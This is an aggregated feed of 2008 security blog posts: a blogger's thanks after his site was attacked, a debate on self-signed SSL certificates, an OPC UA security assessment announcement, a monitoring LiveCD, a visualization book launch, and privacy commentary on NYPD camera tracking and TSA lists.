I am also extremely humbled and grateful for all of the help that so many of you have rendered over this week. I never truly felt part of the security "community" until this week. Over the coming days I am going to talk about what you should do if this happens to you. However, having friends and support in the industry is something that most of us just don't have. The security community has reached out and picked me up by the bootstraps, performing incredible acts of kindness and generosity in recovering from this. I realize now that in my years in this industry I have made some great friendships. On top of this, the people I have made friends with are just incredible people! I will detail some of these acts and people in days and weeks to come. For now though know that I will never forget and will do my best to be worthy of your kindness and help. I think some of the other security bloggers in the community are going to speak out on this as well. I will be interested in what they have to say. In case any of you are wondering, I will not stop blogging and speaking out. I would never let the likes of these people silence or intimidate me. In truth the fact that they targeted me tells me that I must have struck a nerve or did some good work, that they would feel it necessary to attack me. In looking at the list of some of the names targeted along with me, I was almost honored to be included in such a prestigious group. I recognize that my blog and StillSecure is pretty well known and I guess that this shows that I am a target. For now my blog will remain sparse. As I continue to build it back up, I want to make sure that everything that is going in is clean of any malicious code. Stay tuned for more to come and thanks for sticking with me! |
Upping the stakes for insane spam titles.... [Vitalsecurity.org - A Revolution is the Solution] Posted: 14 Aug 2008 11:56 AM CDT
Certifiably Silly [Emergent Chaos] Posted: 14 Aug 2008 11:21 AM CDT Over at "The Security Practice," Michael Barrett writes about "Firefox 3.0 and self-signed certificates." Neither he nor I am representing our respective employers.

"...almost everyone who wants to communicate securely using a browser can afford an SSL certificate from CAs such as GoDaddy, Thawte, etc. The cost of single certificates from these sources can only be described as nominal."

There are all sorts of use cases where $29 is not chump change. For example, I own about 8 domains; that's $240 in "security taxes." People in the third world would like to communicate securely. But most importantly, the idea assumes that it's ok to have an infrastructure which is mostly unencrypted, and we may only trust encryption after the certificate priests bless it. When I wrote about turning on "opportunistic encryption for PostFix," my goal was encrypting all email. There's no need for a CA. The threat model is passive adversaries, and there are lots of those.

"My company is a major target of phishing, and as such we've spent quite a bit of time researching what anti-phishing approaches work. We published a whitepaper on this topic (which can be found on the company blog at www.thepaypalblog.com), which explains this in detail. However, a couple of relevant conclusions are that: 1) the vast majority of users simply want to be protected, 2) there's no single "silver bullet", and 3) that what we describe as "safer browsers" such as IE 7, and Firefox 3.0 are a significant part of the solution based on their improvements in user visible security indicators and secure-by-default behaviors."

You can't always get what you want. Really, most people have little understanding of the issues. I think this is in large part because we've been talking down to them, in some part because the issues are complex, and in some part because it's not important enough for them to want to become educated. It's especially not important enough in light of debates like this one. We should try (sometime) to give people what they need. I think we'd agree that the vast majority of users want, need and deserve protection that's as simple and effective as we can make it. I don't think blocking self-signed certs is a large part of that goal.

"I conflated two or three separate ideas in that last sentence, and I should explain them. The general logic is that most users should never be presented with a security dialog that gives them a choice - if they are, there's typically at least a 50:50 chance that the wrong decision will be made. Instead, the browser should make the decision for them. However, in the case of self-signed certificates it's almost impossible to see how any technology can disambiguate between legitimate uses and criminal ones."

Even viewed through the lens presented, the self-signed experience doesn't make perfect sense, unless you start with the assumption that a $29 SSL cert has some useful security value. I don't believe it does. What it does is get rid of the 'self-signed' warnings. There are cheaper and easier ways to do that. Most of the certificates out there are signed by a company that the relying consumers have never heard of. There's just not that much verification that can be done for $29. Today, anyone who's broken into a company's mail server can buy a fake cert with a stolen credit card. Now, Michael's employer is under massive attack. I am sympathetic to their desire to improve things, and I applaud a lot of things that they do. For example, their use of one time password tokens is great. I also think there's great value to pushing people to recent browsers. At the same time, it's sensible for them to want to shift risk; part of me even welcomes the risks and attacks hitting the CAs. But I think that imposing yet another security tax, based on a static analysis of attackers, and some certificate authority pixie dust isn't going to help things for very long. And given the very real costs and the very fuzzy benefits, I think that breaking self-signed certificates is the wrong approach. What's the right approach? I wrote "Preserving the Internet Channel Against Phishers" three years ago. I think that the advice isn't silly at all.
Which Iceberg's Bigger? [ImperViews] Posted: 14 Aug 2008 11:20 AM CDT When I was writing the tip of the iceberg post I was excited by the thought that the overall damage of the data loss problem is much higher than reported. According to the Wall Street Journal, the Federal Trade Commission estimates nearly $50 billion is lost annually as a result of identity theft and credit-card fraud, with part of it absorbed by banks. In other words, not only are the numbers probably much higher than reported, and therefore than estimated by the FTC, it also seems like the bigger data loss events are a direct result of one of the following causes:
SecureSphere covers all those use cases. In other words, the portion of the problem that can be addressed by SecureSphere is very big. Huge.
OPC UA Assessment Series: Part 1 [Digital Bond] Posted: 14 Aug 2008 08:56 AM CDT Digital Bond has just completed a security assessment report on the OPC Unified Architecture [UA] protocol, and we will be issuing a series of blog posts supported with SCADApedia content on the results. The assessment included both a paper security review of the multi-part OPC UA specification and an application assessment of the OPC Foundation’s Software Development Kit [SDK]. The SDK consists of a communication stack that vendors can build OPC UA applications on top of as well as sample client and server applications. The OPC UA security controls are in the communication stack. You can think of this as an assessment of a library with the sample client and server exercising the library. This is an ideal time to review OPC UA security. The specifications are complete enough to support a review, and the SDK that many vendors will use to develop OPC UA client and server applications is out in beta, and OPC UA is not yet used in production systems. So by identifying and correcting vulnerabilities now, we can prevent them from getting deployed and avoid the reluctance and difficulty in making changes in operational systems. The tentative organization of this series is:
One last point that is important to highlight in this introduction is the OPC Foundation’s interest in security. The OPC Foundation took an attitude that is still all too rare. They were eager and supportive of this assessment. In addition to the specification and SDK that any member can get, the OPC Foundation also provided the source code. In return, Digital Bond provided the OPC Foundation the full assessment report including findings and recommendations. In discussions throughout the assessment it was very clear the OPC Foundation wanted to identify any security problems, and they wanted to fix them. In fact, you will note that Part 7 will list how the OPC Foundation has addressed and corrected the majority of the findings. We are aware a lot of this is already done or in process, but we will hold off on Part 7 until the revised specification and SDK are available.
Security Briefing: August 14th [Liquidmatrix Security Digest] Posted: 14 Aug 2008 07:28 AM CDT Yesterday was a whirlwind but, at the very least, I was productive. Tried my “loud music while working” trick again. Worked like a champ. Click here to subscribe to Liquidmatrix Security Digest! And now, the news…
You Decide! [Vitalsecurity.org - A Revolution is the Solution] Posted: 14 Aug 2008 05:28 AM CDT Is this: 1) A brilliant defence of Mylol.net 2) A scathing attack on Mylol.net 3) Something that was, in fact, posted by The Batman of Zur-En-Arrh while out of his mind on PCP. Because I honestly have no idea.
New NoVA Infosec Calendar Feature & ShareThis Capability [NovaInfosecPortal.com] Posted: 14 Aug 2008 02:06 AM CDT In an effort to help everyone plan a little bit more in advance, we’ve added a calendar for events that take place in or around NoVA. Currently, we’re just beta testing it to see how it works out. Please feel free to let us know what you think in the comments for this post. Also, use our Contact Us page to submit events that you would like added to the calendar. I’m hoping that in the future we can set something up so anyone can add events (with a little moderation, of course). Any suggestions would be appreciated. You may have also noticed that we added a ShareThis capability in our posts and pages. Hopefully, this feature will make it easier for you to pass along any nuggets to other infosec professionals. Enjoy!
Posted: 14 Aug 2008 12:06 AM CDT Everyone (read: me) is looking for an unfair advantage. The cloak of invisibility that allows you to see and not be seen, or makes your product sell like there's nothing else. If you were watching the Summer Olympics swimming contest, you could have understood how technology can be translated into unfair advantage, in its positive meaning. The number of new world records is skyrocketing. In fact, it looks like we have a new world record for the number of world records.... Taste some of the debate at the Sport Scientists, and here the other experts are claiming that it's harmful. The
Twitter Updates for 2008-08-13 [.:Computer Defense:.] Posted: 13 Aug 2008 10:59 PM CDT
I Should Have Seen This Coming [BumpInTheWire.com] Posted: 13 Aug 2008 10:56 PM CDT It all started about 11:15 today. As I got out of my chair to leave to go pick up a sick kid I noticed El Sidekick had some road rash on his chin. His reluctance to explain what happened kicked my imagination into overdrive to a point that I don’t want to know what happened, because it will just be disappointing compared to what my brain came up with. I worked from home this afternoon preparing to support El Sidekick upgrading our two LANsight Security Management Appliances to the latest 5.1 code. I downloaded and read the documentation (a rarity for me) to get myself prepared. The upgrade was supposed to happen at 6:30 PM tonight. “Supposed to” being the key words there. Late this afternoon I got the configs backed up just in case things went south during the upgrade. We’re all set. 6:30 comes and goes. 6:45 comes and goes. 7:00 comes and goes. At 7:07 I email El Sidekick a message that said “sure are using the word ‘about’ loosely” in reference to an “about 6:30” start time. Finally at 7:19 I get a reply. Being nearly an hour behind now should have been another clue as to how the night would end. We had to make some networking changes in order to accommodate the new hardware, being installed tomorrow, so once that was complete we were ready for the upgrade. First attempt revealed a web server issue that we had to work through. Once we got that behind us we were cleared for take off. Unfortunately the plane never even left the gate. When initiating the upgrade we got an error so vague that only one thing came to mind. We did the standard operating procedure to try to get around it. Rebooted the server, downloaded the upgrade image again, etc, etc, all with no luck. Why should I change my name? He’s the one that sucks. - Michael Bolton in Office Space
Outrage At NY Police Tracking Plan [Liquidmatrix Security Digest] Posted: 13 Aug 2008 08:21 PM CDT The NYPD has set off the community with a proposed plan to track vehicles with the use of a mesh of cameras. The entire idea is to drop a surveillance web across Manhattan. All of this under the guise of avoiding another terrorist attack. The ultimate “go to” excuse to strip away rights and spend money on blinking lights. From The Guardian:
Folks in NYC might be pissed at this possibility. I would offer that this has been shown to be relatively ineffective in London, where the “ring of steel” does little more than spot the occasional panhandler. The New York “sentinel” video system will be set up to record license plates of all vehicles at every point into Manhattan. The data would be “kept on computer for a month”. Uh huh. If you are willing to swallow that nonsense I have some land in Florida I would be willing to sell ya. For the full article read on.
raWPacket HeX - Network Security Monitoring & Analysis LiveCD [Darknet - The Darkside] Posted: 13 Aug 2008 04:01 PM CDT HeX is a project aimed at the NSM (Network Security Monitoring) community for use by network security analysts. The developers believe that simplicity and analysis work flow logic must be enhanced and emphasized throughout the process of designing this liveCD. Not only have they carefully chosen all the necessary applications and tools to be... Read the full post at darknet.org.uk
Applied Security Visualization Book is Available! [Raffy - Security Data Visualization] Posted: 13 Aug 2008 03:38 PM CDT The Applied Security Visualization book is DONE and available in your favorite store! Last Tuesday when I arrived at BlackHat, I walked straight up to the book store. And there it was! I held it in my hands for the first time. I have to say, it was a really emotional moment. Seeing the product of 1.5 years of work was just amazing. I am really happy with how the book turned out. The color insert in the middle is a real eye-catcher for people flipping through the book, and it greatly helps make some of the graphs easier to interpret. I had a few copies to give away during BlackHat and DefCon. I am glad I was able to give copies to some people that have contributed by inspiring me, challenging me, or even giving me very specific use-cases that I collected in the book. Thanks everyone again! I really appreciate all your help. People keep asking me what the next project is now that the book is out. Well, I am still busy. secviz.org is one of my projects. I am trying to get more people involved in the discussions and get more people to contribute graphs. Another project I am starting is to build out a training around the book, which I want to teach at security conferences. I have a few leads already for that. Drop me a note if you would be interested in taking such a training. Maybe I will also get some time to work on AfterGlow some more. I have a lot of ideas on that end… During DefCon, I recorded a PodCast with Martin McKeay where I talk a little bit about the book.
USPTO To Revisit Dell’s ‘Cloud Computing’ Claim [Liquidmatrix Security Digest] Posted: 13 Aug 2008 02:29 PM CDT Catching up on my reading. I missed this article last week as I was focused on BH/Defcon. There’s some good news from the US Patent office for a change. From IT World:
Read on for the full article.
TSA Puts Fliers Without ID On A List [Liquidmatrix Security Digest] Posted: 13 Aug 2008 02:24 PM CDT So, if it wasn’t bad enough that there are 1 million plus folks on the “do not fly” list it appears that there is another list in the USA. The TSA (my buds) have managed to take the names of people who fly within the US without ID, which is legal, and compile a list. So, where have these names ended up? Funny you ask. They’ve been added to a database of folks who have violated security laws or have been questioned due to their behaviour. WTF? From USA Today:
OK, so let me get this straight: this info is to “helps track potential terrorists”? Did anyone at the TSA miss the fact that it is perfectly legal for US citizens to travel without ID within the States? And the data will be stored in some cases for up to 15 years. Don’t forget your wallet.